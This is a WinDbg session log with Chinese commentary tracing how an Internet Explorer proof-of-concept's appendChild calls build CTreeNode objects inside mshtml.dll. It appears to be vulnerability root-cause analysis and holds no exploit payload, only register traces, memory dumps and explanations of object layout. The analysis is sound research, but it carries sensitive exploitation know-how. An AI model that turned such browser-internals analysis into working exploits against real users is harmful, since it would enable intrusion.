1:021> p eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=00000000 eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CElement::Doc+0x7: 6a2ac407 8b400c mov eax,dword ptr [eax+0Ch] ds:0023:18b1cff4=05ad0680 1:021> p eax=05ad0680 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=00000000 eip=6a2ac40a esp=0425e70c ebp=0425e768 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CElement::Doc+0xa: 6a2ac40a c3 ret 1:021> dd eax 05ad0680 6a2a1e88 00000014 000000b0 00000000 05ad0690 00000000 6a2bb610 05ad0680 054aeb8c 05ad06a0 000040a8 000021e6 054aeba8 00000000 05ad06b0 077d5f88 00000001 00000002 00000000 05ad06c0 00000000 00000000 00000000 00000000 05ad06d0 00000000 07560fc8 04ea8870 00000000 05ad06e0 00000000 00105804 00000000 13fbded8 05ad06f0 00000006 00000005 0000001d 00000000 1:021> ln poi(eax) (6a2a1e88) mshtml!CDoc::`vftable' | (6a2bb610) mshtml!CDoc::`vftable' Exact matches: mshtml!CDoc::`vftable' = <no type information>
取CSecurityContext对象0xC偏移的值作为返回,通过求符号可以看到这个货其实是CDoc对象的指针。也就是说CElement::Doc的作用是单纯的返回mshtml!Doc的地址,Doc对象是代表html dom树总根的,就是<html></html>
1:021> eax=0425e71c ebx=6a628b0c ecx=150e3fd0 edx=6a2ac916 esi=150e3fd0 edi=00000000 eip=6a1f21a6 esp=0425e710 ebp=0425e768 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::InsertBeforeHelper+0x3c: 6a1f21a6 e8deab0b00 call mshtml!CElement::GetWindowedMarkupContext (6a2acd89) 1:021> eax=06d62f30 ebx=6a628b0c ecx=00000000 edx=6a2ac8f9 esi=150e3fd0 edi=00000000 eip=6a1f21ab esp=0425e710 ebp=0425e768 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::InsertBeforeHelper+0x41: 6a1f21ab 8bd8 mov ebx,eax 1:021> ln poi(eax) (6a2a20a8) mshtml!CMarkup::`vftable' | (6a2a21a0) mshtml!CMarkupPointer::`vftable' Exact matches: mshtml!CMarkup::`vftable' = <no type information>
明显这个函数获取到了CMarkup对象的指针
1:021> r eax=00000000 ebx=06d62f30 ecx=00000000 edx=00000014 esi=150e3fd0 edi=00000000 eip=6a1f220a esp=0425e708 ebp=0425e768 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 mshtml!CElement::InsertBeforeHelper+0xb9: 6a1f220a e831000000 call mshtml!CElement::GetDOMInsertPosition (6a1f2240) 1:021> ln poi(poi(esp)) (6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information> 1:021> ln poi(poi(esp+4)) (6a2a21a0) mshtml!CMarkupPointer::`vftable' | (6a2a2278) mshtml!CIPrintCollection::`vftable' Exact matches: mshtml!CMarkupPointer::`vftable' = <no type information>
以两个对象的地址作为参数
Breakpoint 5 hit eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode: 6a2bced0 8bff mov edi,edi 1:021> kp ChildEBP RetAddr 0425e590 6a210d02 mshtml!CTreeNode::CTreeNode 0425e630 6a1f1c01 mshtml!CMarkup::InsertElementInternal+0x23d 0425e66c 6a1f1b36 mshtml!CDoc::InsertElement+0x8a 0425e700 6a1f2222 mshtml!CCommentElement::`scalar deleting destructor'+0x23e 0425e768 6a1f2148 mshtml!CElement::InsertBeforeHelper+0xd1 0425e784 6a1f20fe mshtml!CElement::insertBefore+0x3c 0425e7c4 6a1f1436 mshtml!CElement::appendChild+0x3a 0425e7f8 6a32235c mshtml!Method_IDispatchpp_IDispatchp+0xcb 0425e86c 6a32c75a mshtml!CBase::ContextInvokeEx+0x5dc 0425e8bc 6a32c79a mshtml!CElement::ContextInvokeEx+0x9d 0425e8e8 6a2d3104 mshtml!CInput::VersionedInvokeEx+0x2d 0425e93c 6c75a22a mshtml!PlainInvokeEx+0xeb 0425e978 6c75a175 jscript!IDispatchExInvokeEx2+0x104 0425e9b4 6c75a3f6 jscript!IDispatchExInvokeEx+0x6a 0425ea74 6c75a4a0 jscript!InvokeDispatchEx+0x98 0425eaa8 6c76d8c8 jscript!VAR::InvokeByName+0x139 0425eaf4 6c76d96f jscript!VAR::InvokeDispName+0x7d 0425eb20 6c76e3e7 jscript!VAR::InvokeByDispID+0xce 0425ecbc 6c765c9d jscript!CScriptRuntime::Run+0x2b80 0425eda4 6c765bfb jscript!ScrFncObj::CallWithFrameOnStack+0xce
只要等到这个函数CTreeNode::CTreeNode函数执行完毕就可以去看内存中初始化完毕的数据了,由于CTreeNode对象的前四个字节就是所属元素对象的指针,所以获取这个值即可
1:021> p eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x2: 6a2bced2 55 push ebp 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x3: 6a2bced3 8bec mov ebp,esp 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x5: 6a2bced5 8a450c mov al,byte ptr [ebp+0Ch] ss:0023:0425e59c=00 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x8: 6a2bced8 c0e004 shl al,4 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0xb: 6a2bcedb 324109 xor al,byte ptr [ecx+9] ds:0023:127c7fb9=00 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bcede esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0xe: 6a2bcede 56 push esi 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8 eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0xf: 6a2bcedf 8b7140 mov esi,dword ptr [ecx+40h] ds:0023:127c7ff0=00000000 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x12: 6a2bcee2 2410 and al,10h 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x14: 6a2bcee4 304109 xor byte ptr [ecx+9],al ds:0023:127c7fb9=00 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x17: 6a2bcee7 8a5109 mov dl,byte ptr [ecx+9] ds:0023:127c7fb9=00 1:021> eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bceea esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x1a: 6a2bceea b8ffffffff mov eax,0FFFFFFFFh 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bceef esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x1f: 6a2bceef 6689410a mov word ptr [ecx+0Ah],ax ds:0023:127c7fba=0000 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x23: 6a2bcef3 0bc0 or eax,eax 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x25: 6a2bcef5 83e607 and esi,7 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8 eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x28: 6a2bcef8 83ce08 or esi,8 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x2b: 6a2bcefb 6689410c mov word ptr [ecx+0Ch],ax ds:0023:127c7fbc=0000 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bceff esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x2f: 6a2bceff 83c8ff or eax,0FFFFFFFFh 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x32: 6a2bcf02 897140 mov dword ptr [ecx+40h],esi ds:0023:127c7ff0=00000000 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x35: 6a2bcf05 6689410e mov word ptr [ecx+0Eh],ax ds:0023:127c7fbe=0000 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x39: 6a2bcf09 8939 mov dword ptr [ecx],edi ds:0023:127c7fb0=00000000 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x3b: 6a2bcf0b 85ff test edi,edi 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x3d: 6a2bcf0d 7406 je mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=0] 1:021> eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x3f: 6a2bcf0f 8a4718 mov al,byte ptr [edi+18h] ds:0023:1af02ff0=60 1:021> eax=ffffff60 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x42: 6a2bcf12 884108 mov byte ptr [ecx+8],al ds:0023:127c7fb8=00 1:021> eax=ffffff60 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x45: 6a2bcf15 8b4508 mov eax,dword ptr [ebp+8] ss:0023:0425e598=15171fb0 1:021> eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x48: 6a2bcf18 894104 mov dword ptr [ecx+4],eax ds:0023:127c7fb4=00000000 1:021> eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x4b: 6a2bcf1b 85ff test edi,edi 1:021> eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x4d: 6a2bcf1d 0f84f15deaff je mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=0] 1:021> eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x4f: 6a2bcf23 0fb64108 movzx eax,byte ptr [ecx+8] ds:0023:127c7fb8=60 1:021> eax=00000060 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x53: 6a2bcf27 e8cd020000 call mshtml!IsPreLikeTag (6a2bd1f9) 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x5c: 6a2bcf2c 85c0 test eax,eax 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x5e: 6a2bcf2e 0f95c0 setne al 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x61: 6a2bcf31 c0e003 shl al,3 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x64: 6a2bcf34 32c2 xor al,dl 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x66: 6a2bcf36 2408 and al,8 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x68: 6a2bcf38 32c2 xor al,dl 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x6a: 6a2bcf3a 884109 mov byte ptr [ecx+9],al ds:0023:127c7fb9=00 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x6d: 6a2bcf3d 85ff test edi,edi 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x6f: 6a2bcf3f 0f84d65deaff je mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=0] 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x71: 6a2bcf45 0fb64108 movzx eax,byte ptr [ecx+8] ds:0023:127c7fb8=60 1:021> eax=00000060 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTreeNode::CTreeNode+0x75: 6a2bcf49 e8ab020000 call mshtml!IsPreLikeTag (6a2bd1f9) 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x7e: 6a2bcf4e 33d2 xor edx,edx 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x80: 6a2bcf50 85c0 test eax,eax 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x82: 6a2bcf52 0f95c2 setne dl 1:021> eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x85: 6a2bcf55 8bc1 mov eax,ecx 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x87: 6a2bcf57 33d6 xor edx,esi 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=00000008 edi=1af02fd8 eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x89: 6a2bcf59 83e201 and edx,1 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8 eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x8c: 6a2bcf5c 33d6 xor edx,esi 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=00000008 edi=1af02fd8 eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x8e: 6a2bcf5e 895140 mov dword ptr [ecx+40h],edx ds:0023:127c7ff0=00000008 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=00000008 edi=1af02fd8 eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x91: 6a2bcf61 5e pop esi 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=0425e660 edi=1af02fd8 eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x92: 6a2bcf62 5d pop ebp 1:021> eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=0425e660 edi=1af02fd8 eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x93: 6a2bcf63 c20800 ret 8 1:021> dd eax 127c7fb0 1af02fd8 15171fb0 ffff0060 ffffffff 127c7fc0 00000000 00000000 00000000 00000000 127c7fd0 00000000 00000000 00000000 00000000 127c7fe0 00000000 00000000 00000000 00000000 127c7ff0 00000008 00000000 00000000 d0d0d0d0 127c8000 ???????? ???????? ???????? ???????? 127c8010 ???????? ???????? ???????? ???????? 127c8020 ???????? ???????? ???????? ???????? 1:021> dd 1af02fd8 1af02fd8 6a0f70e0 00000002 00000008 00000000 1af02fe8 071faee0 00000000 80000060 00010000 1af02ff8 00000000 18b1cfe8 ???????? ???????? 1af03008 ???????? ???????? ???????? ???????? 1af03018 ???????? ???????? ???????? ???????? 1af03028 ???????? ???????? ???????? ???????? 1af03038 ???????? ???????? ???????? ???????? 1af03048 ???????? ???????? ???????? ???????? 1:021> ln 6a0f70e0 (6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information>
可见这个CTreeNode是属于CPhraseElement的,也就是说POC中的document.body.appendChild(id_0);这句话导致的结果是为Phrase对象创建了CTreeNode对象,那么这个CTreeNode连入谁了呢?根据js我们猜测是body对象
1:021> dd eax 127c7fb0 1af02fd8 15171fb0 ffff0060 ffffffff 127c7fc0 00000000 00000000 00000000 00000000 127c7fd0 00000000 00000000 00000000 00000000 127c7fe0 00000000 00000000 00000000 00000000 127c7ff0 00000008 00000000 00000000 d0d0d0d0 127c8000 ???????? ???????? ???????? ???????? 127c8010 ???????? ???????? ???????? ???????? 127c8020 ???????? ???????? ???????? ???????? 1:021> dd 15171fb0 15171fb0 150e3fd0 1379cfb0 00046210 00090004 15171fc0 00000551 00000008 1515ffc0 15171fd8 15171fd0 1515ffd8 1976dfe0 00000062 00000000 15171fe0 1362afd8 13e48fe0 13e48fe0 1379cfd8 15171ff0 00000008 00000000 00000000 d0d0d0d0 15172000 ???????? ???????? ???????? ???????? 15172010 ???????? ???????? ???????? ???????? 15172020 ???????? ???????? ???????? ???????? 1:021> dd 150e3fd0 150e3fd0 6a246670 00000005 00000008 07701fe8 150e3fe0 071fae80 15171fb0 00000010 8202e280 150e3ff0 00000002 104d4f00 00000000 d0d0d0d0 150e4000 ???????? ???????? ???????? ???????? 150e4010 ???????? ???????? ???????? ???????? 150e4020 ???????? ???????? ???????? ???????? 150e4030 ???????? ???????? ???????? ???????? 150e4040 ???????? ???????? ???????? ???????? 1:021> ln 6a246670 (6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information>
果然没错,就是body对象
1:021> r eax=00000000 ebx=0425e960 ecx=00000005 edx=00000003 esi=0425e950 edi=0425e950 eip=6c77d711 esp=0425e834 ebp=0425e870 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 jscript!sin: 6c77d711 ff256810756c jmp dword ptr [jscript!_imp__sin (6c751068)] ds:0023:6c751068={msvcrt!sin (773d8aea)}
成功撞上我们的辅助调试语句
1:021> g Breakpoint 4 hit eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi=00001200 edi=00000000 eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 mshtml!CElement::appendChild: 6a1f20c4 8bff mov edi,edi
第二条appendChild导致的中断,按同样的方法调试
